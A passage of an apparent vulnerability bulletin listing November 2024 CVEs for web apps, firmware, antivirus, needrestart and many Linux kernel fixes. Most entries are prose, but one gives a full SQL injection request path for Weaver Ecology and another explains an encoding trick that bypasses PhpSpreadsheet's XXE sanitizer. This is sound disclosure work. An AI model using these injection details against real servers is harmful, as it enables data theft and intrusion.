MarkUs, a web application for the submission and grading of student assignments, is vulnerable to path traversal in versions prior to 2.4.8. Authenticated instructors may download any file on the web server MarkUs is running on, depending on the file permissions. MarkUs v2.4.8 has addressed this issue. No known workarounds are available at the application level aside from upgrading. | 2024-11-18 | not yet calculated | CVE-2024-47820 |
| n/a -- n/a |
An issue was discovered in Centreon Web 24.10.x before 24.10.0, 24.04.x before 24.04.8, 23.10.x before 23.10.18, 23.04.x before 23.04.23, and 22.10.x before 22.10.26. A stored XSS was found in the user configuration contact name field. This form is only accessible to authenticated users with high-privilege access. | 2024-11-22 | not yet calculated | CVE-2024-47863 |
| n/a -- n/a |
Missing authentication for critical function vulnerability exists in Rakuten Turbo 5G firmware version V1.3.18 and earlier. If this vulnerability is exploited, a remote unauthenticated attacker may update or downgrade the firmware on the device. | 2024-11-20 | not yet calculated | CVE-2024-47865 |
| n/a -- n/a |
PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. The XmlScanner class has a scan method which should prevent XXE attacks. However, prior to versions 1.9.4, 2.1.3, 2.3.2, and 3.4.0, the regexes used in the `scan` method and the findCharSet method can be bypassed by using UCS-4 and encoding guessing. An attacker can bypass the sanitizer and achieve an XML external entity attack. Versions 1.9.4, 2.1.3, 2.3.2, and 3.4.0 fix the issue. | 2024-11-18 | not yet calculated | CVE-2024-47873 |
| n/a -- n/a |
A vulnerability was found in Weaver E-cology allows attackers use race conditions to bypass security mechanisms to upload malicious files and control server privileges | 2024-11-19 | not yet calculated | CVE-2024-48069 |
| n/a -- n/a |
An issue in Weaver E-cology v. attackers construct special requests to insert remote malicious code and to trigger malicious code execution, and control server privileges | 2024-11-19 | not yet calculated | CVE-2024-48070 |
| n/a -- n/a |
E-cology has a directory traversal vulnerability. An attacker can exploit this vulnerability to delete the server directory, causing the server to permanently deny service. | 2024-11-19 | not yet calculated | CVE-2024-48071 |
| n/a -- n/a |
Weaver Ecology v9.* was discovered to contain a SQL injection vulnerability via the component /mobilemode/Action.jsp?invoker=com.weaver.formmodel.mobile.mec.servlet.MECAction&action=getFieldTriggerValue&searchField=*&fromTable=HrmResourceManager&whereClause=1%3d1&triggerCondition=1&expression=%3d&fieldValue=1. | 2024-11-19 | not yet calculated | CVE-2024-48072 |
| n/a -- n/a |
Linksys E3000 1.0.06.002_US is vulnerable to command injection via the diag_ping_start function. | 2024-11-21 | not yet calculated | CVE-2024-48286 |
| n/a -- n/a |
TP-Link TL-IPC42C V4.0_20211227_1.0.16 is vulnerable to command injection due to the lack of malicious code verification on both the frontend and backend. | 2024-11-21 | not yet calculated | CVE-2024-48288 |
| n/a -- n/a |
An issue in the wssrvc.exe service of QuickHeal Antivirus Pro Version v24.0 and Quick Heal Total Security v24.0 allows authenticated attackers to escalate privileges. | 2024-11-18 | not yet calculated | CVE-2024-48292 |
| n/a -- n/a |
Incorrect access control in QuickHeal Antivirus Pro 24.1.0.182 and earlier allows authenticated attackers with low-level privileges to arbitrarily modify antivirus settings. | 2024-11-18 | not yet calculated | CVE-2024-48293 |
| n/a -- n/a |
A NULL pointer dereference in the component libPdfCore.dll of Wondershare PDF Reader v1.0.9.2544 allows attackers to cause a Denial of Service (DoS) via a crafted PDF file. | 2024-11-18 | not yet calculated | CVE-2024-48294 |
| n/a -- n/a |
An issue in the Instructor Appointment Availability module of eSoft Planner 3.24.08271-USA allows attackers to cause a Denial of Service (DoS) via a crafted POST request. | 2024-11-20 | not yet calculated | CVE-2024-48530 |
| n/a -- n/a |
A reflected cross-site scripting (XSS) vulnerability on the Rental Availability module of eSoft Planner 3.24.08271-USA allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload. | 2024-11-20 | not yet calculated | CVE-2024-48531 |
| n/a -- n/a |
A discrepancy between responses for valid and invalid e-mail accounts in the Forgot your Login? module of eSoft Planner 3.24.08271-USA allows attackers to enumerate valid user e-mail accounts. | 2024-11-20 | not yet calculated | CVE-2024-48533 |
| n/a -- n/a |
A reflected cross-site scripting (XSS) vulnerability on the Camp Details module of eSoft Planner 3.24.08271-USA allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload. | 2024-11-20 | not yet calculated | CVE-2024-48534 |
| n/a -- n/a |
A stored cross-site scripting (XSS) vulnerability in eSoft Planner 3.24.08271-USA allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name parameter. | 2024-11-20 | not yet calculated | CVE-2024-48535 |
| n/a -- n/a |
Incorrect access control in eSoft Planner 3.24.08271-USA allow attackers to view all transactions performed by the company via supplying a crafted web request. | 2024-11-20 | not yet calculated | CVE-2024-48536 |
| n/a -- n/a |
File Upload vulnerability in Xi'an Daxi Information technology OfficeWeb365 v.8.6.1.0 and v7.18.23.0 allows a remote attacker to execute arbitrary code via the pw/savedraw component. | 2024-11-19 | not yet calculated | CVE-2024-48694 |
| n/a -- n/a |
An issue in alist-tvbox v1.7.1 allows a remote attacker to execute arbitrary code via the /atv-cli file. | 2024-11-21 | not yet calculated | CVE-2024-48747 |
| n/a -- n/a |
An OS command injection vulnerability has been reported to affect several product versions. If exploited, the vulnerability could allow remote attackers to execute commands. We have already fixed the vulnerability in the following version: QuRouter 2.4.3.103 and later | 2024-11-22 | not yet calculated | CVE-2024-48860 |
| n/a -- n/a |
An OS command injection vulnerability has been reported to affect several product versions. If exploited, the vulnerability could allow local network attackers to execute commands. We have already fixed the vulnerability in the following versions: QuRouter 2.4.4.106 and later | 2024-11-22 | not yet calculated | CVE-2024-48861 |
| n/a -- n/a |
A link following vulnerability has been reported to affect QuLog Center. If exploited, the vulnerability could allow remote attackers to traverse the file system to unintended locations and read or overwrite the contents of unexpected files. We have already fixed the vulnerability in the following versions: QuLog Center 1.7.0.831 ( 2024/10/15 ) and later QuLog Center 1.8.0.888 ( 2024/10/15 ) and later | 2024-11-22 | not yet calculated | CVE-2024-48862 |
| n/a -- n/a |
Improper neutralization of special elements used in an OS command ('OS Command Injection') issue exists in Rakuten Turbo 5G firmware version V1.3.18 and earlier. If this vulnerability is exploited, a remote authenticated attacker may execute an arbitrary OS command. | 2024-11-20 | not yet calculated | CVE-2024-48895 |
| n/a -- n/a |
A vulnerability was found in Moodle. Additional checks are required to ensure users can only fetch the list of course badges for courses that they are intended to have access to. | 2024-11-20 | not yet calculated | CVE-2024-48899 |
| n/a -- n/a |
PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. The `XmlScanner` class has a scan method which should prevent XXE attacks. However, in a bypass of the previously reported `CVE-2024-47873`, the regexes from the `findCharSet` method, which is used for determining the current encoding can be bypassed by using a payload in the encoding UTF-7, and adding at end of the file a comment with the value `encoding="UTF-8"` with `"`, which is matched by the first regex, so that `encoding='UTF-7'` with single quotes `'` in the XML header is not matched by the second regex. An attacker can bypass the sanitizer and achieve an XML external entity attack. Versions 1.9.4, 2.1.3, 2.3.2, and 3.4.0 fix the issue. | 2024-11-18 | not yet calculated | CVE-2024-48917 |
| n/a -- n/a |
Improper Control of Generation of Code ('Code Injection'), Cross-Site Request Forgery (CSRF), : Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.17. Users are recommended to upgrade to version 18.12.17, which fixes the issue. | 2024-11-18 | not yet calculated | CVE-2024-48962 |
| n/a -- n/a |
An issue was discovered in MBed OS 6.16.0. When parsing hci reports, the hci parsing software dynamically determines the length of a list of reports by reading a byte from an input stream. It then fetches the length of the first report, uses it to calculate the beginning of the second report, etc. In doing this, it tracks the largest report so it can later allocate a buffer that fits every individual report (but only one at a time). It does not, however, validate that these addresses are all contained within the buffer passed to hciEvtProcessLeExtAdvReport. It is then possible, though unlikely, that the buffer designated to hold the reports is allocated in such a way that one of these out-of-bounds length fields is contained within the new buffer. When the (n-1)th report is copied, it overwrites the length field of the nth report. This now corrupted length field is then used for a memcpy into the new buffer, which may lead to a buffer overflow. | 2024-11-20 | not yet calculated | CVE-2024-48984 |
| n/a -- n/a |
Qualys discovered that needrestart, before version 3.8, allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable. | 2024-11-19 | not yet calculated | CVE-2024-48990 |
| n/a -- n/a |
Qualys discovered that needrestart, before version 3.8, allows local attackers to execute arbitrary code as root by winning a race condition and tricking needrestart into running their own, fake Python interpreter (instead of the system's real Python interpreter). | 2024-11-19 | not yet calculated | CVE-2024-48991 |
| n/a -- n/a |
Qualys discovered that needrestart, before version 3.8, allows local attackers to execute arbitrary code as root by tricking needrestart into running the Ruby interpreter with an attacker-controlled RUBYLIB environment variable. | 2024-11-19 | not yet calculated | CVE-2024-48992 |
| n/a -- n/a |
Microsoft Edge (Chromium-based) Spoofing Vulnerability | 2024-11-22 | not yet calculated | CVE-2024-49054 |
| n/a -- n/a |
Querydsl 5.1.0 and OpenFeign Querydsl 6.8 allows SQL/HQL injection in orderBy in JPAQuery. | 2024-11-20 | not yet calculated | CVE-2024-49203 |
| n/a -- n/a |
Multiple endpoints in `oracle-sidecar` in versions 0.347.0 to 0.543.0 were found to be vulnerable to SQL injections. | 2024-11-21 | not yet calculated | CVE-2024-49588 |
| n/a -- n/a |
Missing Authorization vulnerability in Rextheme WP VR allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP VR: from n/a through 8.5.5. | 2024-11-19 | not yet calculated | CVE-2024-49680 |
| n/a -- n/a |
Missing Authorization vulnerability in Harmonic Design HD Quiz - Save Results Light allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HD Quiz - Save Results Light: from n/a through 0.5. | 2024-11-19 | not yet calculated | CVE-2024-49689 |
| n/a -- n/a |
Missing Authorization vulnerability in WP Sunshine Sunshine Photo Cart allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sunshine Photo Cart: from n/a through 3.2.9. | 2024-11-19 | not yet calculated | CVE-2024-49697 |
| n/a -- n/a |
The back-end does not sufficiently verify the user-controlled filename parameter which makes it possible for an attacker to perform a path traversal attack and retrieve arbitrary files from the file system. | 2024-11-22 | not yet calculated | CVE-2024-50054 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: usb: musb: sunxi: Fix accessing an released usb phy Commit 6ed05c68cbca ("usb: musb: sunxi: Explicitly release USB PHY on exit") will cause that usb phy @glue->xceiv is accessed after released. 1) register platform driver @sunxi_musb_driver // get the usb phy @glue->xceiv sunxi_musb_probe() -> devm_usb_get_phy(). 2) register and unregister platform driver @musb_driver musb_probe() -> sunxi_musb_init() use the phy here //the phy is released here musb_remove() -> sunxi_musb_exit() -> devm_usb_put_phy() 3) register @musb_driver again musb_probe() -> sunxi_musb_init() use the phy here but the phy has been released at 2). ... Fixed by reverting the commit, namely, removing devm_usb_put_phy() from sunxi_musb_exit(). | 2024-11-19 | not yet calculated | CVE-2024-50269 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: avoid overflow in damon_feed_loop_next_input() damon_feed_loop_next_input() is inefficient and fragile to overflows. Specifically, 'score_goal_diff_bp' calculation can overflow when 'score' is high. The calculation is actually unnecessary at all because 'goal' is a constant of value 10,000. Calculation of 'compensation' is again fragile to overflow. Final calculation of return value for under-achiving case is again fragile to overflow when the current score is under-achieving the target. Add two corner cases handling at the beginning of the function to make the body easier to read, and rewrite the body of the function to avoid overflows and the unnecessary bp value calcuation. | 2024-11-19 | not yet calculated | CVE-2024-50270 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: signal: restore the override_rlimit logic Prior to commit d64696905554 ("Reimplement RLIMIT_SIGPENDING on top of ucounts") UCOUNT_RLIMIT_SIGPENDING rlimit was not enforced for a class of signals. However now it's enforced unconditionally, even if override_rlimit is set. This behavior change caused production issues. For example, if the limit is reached and a process receives a SIGSEGV signal, sigqueue_alloc fails to allocate the necessary resources for the signal delivery, preventing the signal from being delivered with siginfo. This prevents the process from correctly identifying the fault address and handling the error. From the user-space perspective, applications are unaware that the limit has been reached and that the siginfo is effectively 'corrupted'. This can lead to unpredictable behavior and crashes, as we observed with java applications. Fix this by passing override_rlimit into inc_rlimit_get_ucounts() and skip the comparison to max there if override_rlimit is set. This effectively restores the old behavior. | 2024-11-19 | not yet calculated | CVE-2024-50271 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: filemap: Fix bounds checking in filemap_read() If the caller supplies an iocb->ki_pos value that is close to the filesystem upper limit, and an iterator with a count that causes us to overflow that limit, then filemap_read() enters an infinite loop. This behaviour was discovered when testing xfstests generic/525 with the "localio" optimisation for loopback NFS mounts. | 2024-11-19 | not yet calculated | CVE-2024-50272 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: btrfs: reinitialize delayed ref list after deleting it from the list At insert_delayed_ref() if we need to update the action of an existing ref to BTRFS_DROP_DELAYED_REF, we delete the ref from its ref head's ref_add_list using list_del(), which leaves the ref's add_list member not reinitialized, as list_del() sets the next and prev members of the list to LIST_POISON1 and LIST_POISON2, respectively. If later we end up calling drop_delayed_ref() against the ref, which can happen during merging or when destroying delayed refs due to a transaction abort, we can trigger a crash since at drop_delayed_ref() we call list_empty() against the ref's add_list, which returns false since the list was not reinitialized after the list_del() and as a consequence we call list_del() again at drop_delayed_ref(). This results in an invalid list access since the next and prev members are set to poison pointers, resulting in a splat if CONFIG_LIST_HARDENED and CONFIG_DEBUG_LIST are set or invalid poison pointer dereferences otherwise. So fix this by deleting from the list with list_del_init() instead. | 2024-11-19 | not yet calculated | CVE-2024-50273 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: idpf: avoid vport access in idpf_get_link_ksettings When the device control plane is removed or the platform running device control plane is rebooted, a reset is detected on the driver. On driver reset, it releases the resources and waits for the reset to complete. If the reset fails, it takes the error path and releases the vport lock. At this time if the monitoring tools tries to access link settings, it call traces for accessing released vport pointer. To avoid it, move link_speed_mbps to netdev_priv structure which removes the dependency on vport pointer and the vport lock in idpf_get_link_ksettings. Also use netif_carrier_ok() to check the link status and adjust the offsetof to use link_up instead of link_speed_mbps. | 2024-11-19 | not yet calculated | CVE-2024-50274 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: arm64/sve: Discard stale CPU state when handling SVE traps The logic for handling SVE traps manipulates saved FPSIMD/SVE state incorrectly, and a race with preemption can result in a task having TIF_SVE set and TIF_FOREIGN_FPSTATE clear even though the live CPU state is stale (e.g. with SVE traps enabled). This has been observed to result in warnings from do_sve_acc() where SVE traps are not expected while TIF_SVE is set: | if (test_and_set_thread_flag(TIF_SVE)) | WARN_ON(1); /* SVE access shouldn't have trapped */ Warnings of this form have been reported intermittently, e.g. https://lore.kernel.org/linux-arm-kernel/CA+G9fYtEGe_DhY2Ms7+L7NKsLYUomGsgqpdBj+QwDLeSg=JhGg@mail.gmail.com/ https://lore.kernel.org/linux-arm-kernel/000000000000511e9a060ce5a45c@google.com/ The race can occur when the SVE trap handler is preempted before and after manipulating the saved FPSIMD/SVE state, starting and ending on the same CPU, e.g. | void do_sve_acc(unsigned long esr, struct pt_regs *regs) | { | // Trap on CPU 0 with TIF_SVE clear, SVE traps enabled | // task->fpsimd_cpu is 0. | // per_cpu_ptr(&fpsimd_last_state, 0) is task. | | ... | | // Preempted; migrated from CPU 0 to CPU 1. | // TIF_FOREIGN_FPSTATE is set. | | get_cpu_fpsimd_context(); | | if (test_and_set_thread_flag(TIF_SVE)) | WARN_ON(1); /* SVE access shouldn't have trapped */ | | sve_init_regs() { | if (!test_thread_flag(TIF_FOREIGN_FPSTATE)) { | ... | } else { | fpsimd_to_sve(current); | current->thread.fp_type = FP_STATE_SVE; | } | } | | put_cpu_fpsimd_context(); | | // Preempted; migrated from CPU 1 to CPU 0. | // task->fpsimd_cpu is still 0 | // If per_cpu_ptr(&fpsimd_last_state, 0) is still task then: | // - Stale HW state is reused (with SVE traps enabled) | // - TIF_FOREIGN_FPSTATE is cleared | // - A return to userspace skips HW state restore | } Fix the case where the state is not live and TIF_FOREIGN_FPSTATE is set by calling fpsimd_flush_task_state() to detach from the saved CPU state. This ensures that a subsequent context switch will not reuse the stale CPU state, and will instead set TIF_FOREIGN_FPSTATE, forcing the new state to be reloaded from memory prior to a return to userspace. | 2024-11-19 | not yet calculated | CVE-2024-50275 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: dm: fix a crash if blk_alloc_disk fails If blk_alloc_disk fails, the variable md->disk is set to an error value. cleanup_mapped_device will see that md->disk is non-NULL and it will attempt to access it, causing a crash on this statement "md->disk->private_data = NULL;". | 2024-11-19 | not yet calculated | CVE-2024-50277 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: dm cache: fix potential out-of-bounds access on the first resume Out-of-bounds access occurs if the fast device is expanded unexpectedly before the first-time resume of the cache table. This happens because expanding the fast device requires reloading the cache table for cache_create to allocate new in-core data structures that fit the new size, and the check in cache_preresume is not performed during the first resume, leading to the issue. Reproduce steps: 1. prepare component devices: dmsetup create cmeta --table "0 8192 linear /dev/sdc 0" dmsetup create cdata --table "0 65536 linear /dev/sdc 8192" dmsetup create corig --table "0 524288 linear /dev/sdc 262144" dd if=/dev/zero of=/dev/mapper/cmeta bs=4k count=1 oflag=direct 2. load a cache table of 512 cache blocks, and deliberately expand the fast device before resuming the cache, making the in-core data structures inadequate. dmsetup create cache --notable dmsetup reload cache --table "0 524288 cache /dev/mapper/cmeta \ /dev/mapper/cdata /dev/mapper/corig 128 2 metadata2 writethrough smq 0" dmsetup reload cdata --table "0 131072 linear /dev/sdc 8192" dmsetup resume cdata dmsetup resume cache 3. suspend the cache to write out the in-core dirty bitset and hint array, leading to out-of-bounds access to the dirty bitset at offset 0x40: dmsetup suspend cache KASAN reports: BUG: KASAN: vmalloc-out-of-bounds in is_dirty_callback+0x2b/0x80 Read of size 8 at addr ffffc90000085040 by task dmsetup/90 (...snip...) The buggy address belongs to the virtual mapping at [ffffc90000085000, ffffc90000087000) created by: cache_ctr+0x176a/0x35f0 (...snip...) Memory state around the buggy address: ffffc90000084f00: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 ffffc90000084f80: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 >ffffc90000085000: 00 00 00 00 00 00 00 00 f8 f8 f8 f8 f8 f8 f8 f8 ^ ffffc90000085080: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 ffffc90000085100: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 Fix by checking the size change on the first resume. | 2024-11-19 | not yet calculated | CVE-2024-50278 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: dm cache: fix out-of-bounds access to the dirty bitset when resizing dm-cache checks the dirty bits of the cache blocks to be dropped when shrinking the fast device, but an index bug in bitset iteration causes out-of-bounds access. Reproduce steps: 1. create a cache device of 1024 cache blocks (128 bytes dirty bitset) dmsetup create cmeta --table "0 8192 linear /dev/sdc 0" dmsetup create cdata --table "0 131072 linear /dev/sdc 8192" dmsetup create corig --table "0 524288 linear /dev/sdc 262144" dd if=/dev/zero of=/dev/mapper/cmeta bs=4k count=1 oflag=direct dmsetup create cache --table "0 524288 cache /dev/mapper/cmeta \ /dev/mapper/cdata /dev/mapper/corig 128 2 metadata2 writethrough smq 0" 2. shrink the fast device to 512 cache blocks, triggering out-of-bounds access to the dirty bitset (offset 0x80) dmsetup suspend cache dmsetup reload cdata --table "0 65536 linear /dev/sdc 8192" dmsetup resume cdata dmsetup resume cache KASAN reports: BUG: KASAN: vmalloc-out-of-bounds in cache_preresume+0x269/0x7b0 Read of size 8 at addr ffffc900000f3080 by task dmsetup/131 (...snip...) The buggy address belongs to the virtual mapping at [ffffc900000f3000, ffffc900000f5000) created by: cache_ctr+0x176a/0x35f0 (...snip...) Memory state around the buggy address: ffffc900000f2f80: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 ffffc900000f3000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >ffffc900000f3080: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 ^ ffffc900000f3100: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 ffffc900000f3180: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 Fix by making the index post-incremented. | 2024-11-19 | not yet calculated | CVE-2024-50279 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: dm cache: fix flushing uninitialized delayed_work on cache_ctr error An unexpected WARN_ON from flush_work() may occur when cache creation fails, caused by destroying the uninitialized delayed_work waker in the error path of cache_create(). For example, the warning appears on the superblock checksum error. Reproduce steps: dmsetup create cmeta --table "0 8192 linear /dev/sdc 0" dmsetup create cdata --table "0 65536 linear /dev/sdc 8192" dmsetup create corig --table "0 524288 linear /dev/sdc 262144" dd if=/dev/urandom of=/dev/mapper/cmeta bs=4k count=1 oflag=direct dmsetup create cache --table "0 524288 cache /dev/mapper/cmeta \ /dev/mapper/cdata /dev/mapper/corig 128 2 metadata2 writethrough smq 0" Kernel logs: (snip) WARNING: CPU: 0 PID: 84 at kernel/workqueue.c:4178 __flush_work+0x5d4/0x890 Fix by pulling out the cancel_delayed_work_sync() from the constructor's error path. This patch doesn't affect the use-after-free fix for concurrent dm_resume and dm_destroy (commit 6a459d8edbdb ("dm cache: Fix UAF in destroy()")) as cache_dtr is not changed. | 2024-11-19 | not yet calculated | CVE-2024-50280 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ksmbd: Fix the missing xa_store error check xa_store() can fail, it return xa_err(-EINVAL) if the entry cannot be stored in an XArray, or xa_err(-ENOMEM) if memory allocation failed, so check error for xa_store() to fix it. | 2024-11-19 | not yet calculated | CVE-2024-50284 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ksmbd: check outstanding simultaneous SMB operations If Client send simultaneous SMB operations to ksmbd, It exhausts too much memory through the "ksmbd_work_cache". It will cause OOM issue. ksmbd has a credit mechanism but it can't handle this problem. This patch add the check if it exceeds max credits to prevent this problem by assuming that one smb request consumes at least one credit. | 2024-11-19 | not yet calculated | CVE-2024-50285 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: vivid: fix buffer overwrite when using > 32 buffers The maximum number of buffers that can be requested was increased to 64 for the video capture queue. But video capture used a must_blank array that was still sized for 32 (VIDEO_MAX_FRAME). This caused an out-of-bounds write when using buffer indices >= 32. Create a new define MAX_VID_CAP_BUFFERS that is used to access the must_blank array and set max_num_buffers for the video capture queue. This solves a crash reported by: https://bugzilla.kernel.org/show_bug.cgi?id=219258 | 2024-11-19 | not yet calculated | CVE-2024-50288 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: av7110: fix a spectre vulnerability As warned by smatch: drivers/staging/media/av7110/av7110_ca.c:270 dvb_ca_ioctl() warn: potential spectre issue 'av7110->ci_slot' [w] (local cap) There is a spectre-related vulnerability at the code. Fix it. | 2024-11-19 | not yet calculated | CVE-2024-50289 |
| n/a -- n/a |
The CM Table Of Contents WordPress plugin before 1.2.4 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack. | 2024-11-21 | not yet calculated | CVE-2024-5029 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: cx24116: prevent overflows on SNR calculus as reported by Coverity, if reading SNR registers fail, a negative number will be returned, causing an underflow when reading SNR registers. Prevent that. | 2024-11-19 | not yet calculated | CVE-2024-50290 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: dvb-core: add missing buffer index check dvb_vb2_expbuf() didn't check if the given buffer index was for a valid buffer. Add this check. | 2024-11-19 | not yet calculated | CVE-2024-50291 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ASoC: stm32: spdifrx: fix dma channel release in stm32_spdifrx_remove In case of error when requesting ctrl_chan DMA channel, ctrl_chan is not null. So the release of the dma channel leads to the following issue: [ 4.879000] st,stm32-spdifrx 500d0000.audio-controller: dma_request_slave_channel error -19 [ 4.888975] Unable to handle kernel NULL pointer dereference at virtual address 000000000000003d [...] [ 5.096577] Call trace: [ 5.099099] dma_release_channel+0x24/0x100 [ 5.103235] stm32_spdifrx_remove+0x24/0x60 [snd_soc_stm32_spdifrx] [ 5.109494] stm32_spdifrx_probe+0x320/0x4c4 [snd_soc_stm32_spdifrx] To avoid this issue, release channel only if the pointer is valid. | 2024-11-19 | not yet calculated | CVE-2024-50292 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net/smc: do not leave a dangling sk pointer in __smc_create() Thanks to commit 4bbd360a5084 ("socket: Print pf->create() when it does not clear sock->sk on failure."), syzbot found an issue with AF_SMC: smc_create must clear sock->sk on failure, family: 43, type: 1, protocol: 0 WARNING: CPU: 0 PID: 5827 at net/socket.c:1565 __sock_create+0x96f/0xa30 net/socket.c:1563 Modules linked in: CPU: 0 UID: 0 PID: 5827 Comm: syz-executor259 Not tainted 6.12.0-rc6-next-20241106-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 RIP: 0010:__sock_create+0x96f/0xa30 net/socket.c:1563 Code: 03 00 74 08 4c 89 e7 e8 4f 3b 85 f8 49 8b 34 24 48 c7 c7 40 89 0c 8d 8b 54 24 04 8b 4c 24 0c 44 8b 44 24 08 e8 32 78 db f7 90 <0f> 0b 90 90 e9 d3 fd ff ff 89 e9 80 e1 07 fe c1 38 c1 0f 8c ee f7 RSP: 0018:ffffc90003e4fda0 EFLAGS: 00010246 RAX: 099c6f938c7f4700 RBX: 1ffffffff1a595fd RCX: ffff888034823c00 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 RBP: 00000000ffffffe9 R08: ffffffff81567052 R09: 1ffff920007c9f50 R10: dffffc0000000000 R11: fffff520007c9f51 R12: ffffffff8d2cafe8 R13: 1ffffffff1a595fe R14: ffffffff9a789c40 R15: ffff8880764298c0 FS: 000055557b518380(0000) GS:ffff8880b8600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fa62ff43225 CR3: 0000000031628000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> sock_create net/socket.c:1616 [inline] __sys_socket_create net/socket.c:1653 [inline] __sys_socket+0x150/0x3c0 net/socket.c:1700 __do_sys_socket net/socket.c:1714 [inline] __se_sys_socket net/socket.c:1712 [inline] For reference, see commit 2d859aff775d ("Merge branch 'do-not-leave-dangling-sk-pointers-in-pf-create-functions'") | 2024-11-19 | not yet calculated | CVE-2024-50293 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix missing locking causing hanging calls If a call gets aborted (e.g. because kafs saw a signal) between it being queued for connection and the I/O thread picking up the call, the abort will be prioritised over the connection and it will be removed from local->new_client_calls by rxrpc_disconnect_client_call() without a lock being held. This may cause other calls on the list to disappear if a race occurs. Fix this by taking the client_call_lock when removing a call from whatever list its ->wait_link happens to be on. | 2024-11-19 | not yet calculated | CVE-2024-50294 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: arc: fix the device for dma_map_single/dma_unmap_single The ndev->dev and pdev->dev aren't the same device, use ndev->dev.parent which has dma_mask, ndev->dev.parent is just pdev->dev. Or it would cause the following issue: [ 39.933526] ------------[ cut here ]------------ [ 39.938414] WARNING: CPU: 1 PID: 501 at kernel/dma/mapping.c:149 dma_map_page_attrs+0x90/0x1f8 | 2024-11-19 | not yet calculated | CVE-2024-50295 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: hns3: fix kernel crash when uninstalling driver When the driver is uninstalled and the VF is disabled concurrently, a kernel crash occurs. The reason is that the two actions call function pci_disable_sriov(). The num_VFs is checked to determine whether to release the corresponding resources. During the second calling, num_VFs is not 0 and the resource release function is called. However, the corresponding resource has been released during the first invoking. Therefore, the problem occurs: [15277.839633][T50670] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000020 ... [15278.131557][T50670] Call trace: [15278.134686][T50670] klist_put+0x28/0x12c [15278.138682][T50670] klist_del+0x14/0x20 [15278.142592][T50670] device_del+0xbc/0x3c0 [15278.146676][T50670] pci_remove_bus_device+0x84/0x120 [15278.151714][T50670] pci_stop_and_remove_bus_device+0x6c/0x80 [15278.157447][T50670] pci_iov_remove_virtfn+0xb4/0x12c [15278.162485][T50670] sriov_disable+0x50/0x11c [15278.166829][T50670] pci_disable_sriov+0x24/0x30 [15278.171433][T50670] hnae3_unregister_ae_algo_prepare+0x60/0x90 [hnae3] [15278.178039][T50670] hclge_exit+0x28/0xd0 [hclge] [15278.182730][T50670] __se_sys_delete_module.isra.0+0x164/0x230 [15278.188550][T50670] __arm64_sys_delete_module+0x1c/0x30 [15278.193848][T50670] invoke_syscall+0x50/0x11c [15278.198278][T50670] el0_svc_common.constprop.0+0x158/0x164 [15278.203837][T50670] do_el0_svc+0x34/0xcc [15278.207834][T50670] el0_svc+0x20/0x30 For details, see the following figure. rmmod hclge disable VFs ---------------------------------------------------- hclge_exit() sriov_numvfs_store() ... device_lock() pci_disable_sriov() hns3_pci_sriov_configure() pci_disable_sriov() sriov_disable() sriov_disable() if !num_VFs : if !num_VFs : return; return; sriov_del_vfs() sriov_del_vfs() ... ... klist_put() klist_put() ... ... num_VFs = 0; num_VFs = 0; device_unlock(); In this patch, when driver is removing, we get the device_lock() to protect num_VFs, just like 